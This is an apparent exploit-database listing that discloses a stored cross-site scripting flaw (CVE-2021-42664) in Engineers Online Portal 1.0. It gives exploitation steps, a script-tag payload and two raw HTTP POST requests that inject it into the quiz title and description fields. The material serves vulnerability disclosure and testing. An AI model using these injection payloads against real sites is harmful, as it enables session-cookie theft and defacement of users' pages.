Share
## https://sploitus.com/exploit?id=PACKETSTORM:164617
# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)  
# Exploit Author: Alon Leviev  
# Date: 22-10-2021  
# Category: Web application  
# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip  
# Version: 1.0  
# Tested on: Kali Linux   
# CVE : cve-2021-42664  
# Vulnerable page: add_quiz.php  
# Vulnerable Parameters: "quiz_title", "description"  
  
Technical description:  
A stored XSS vulnerability exists in the Engineers Online Portal. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more.   
  
Steps to exploit:  
1) Navigate to http://localhost/nia_munoz_monitoring_system/add_quiz.php  
2) Insert your payload in the "quiz_title" parameter or the "description" parameter  
3) Click save  
  
Proof of concept (Poc):  
The following payload will allow you to run the javascript -   
<script>alert("This is an XSS Give me your cookies")</script>  
  
---  
  
POST /nia_munoz_monitoring_system/add_quiz.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 91  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/nia_munoz_monitoring_system/add_quiz.php  
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9  
Upgrade-Insecure-Requests: 1  
  
quiz_title=%3Cscript%3Ealert%28%22This+is+an+XSS%22%29%3C%2Fscript%3E&description=xss&save=  
  
OR  
  
POST /nia_munoz_monitoring_system/edit_quiz.php?id=6 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 101  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/nia_munoz_monitoring_system/edit_quiz.php?id=6  
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9  
Upgrade-Insecure-Requests: 1  
  
quiz_id=6&quiz_title=xss&description=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E&save=  
  
---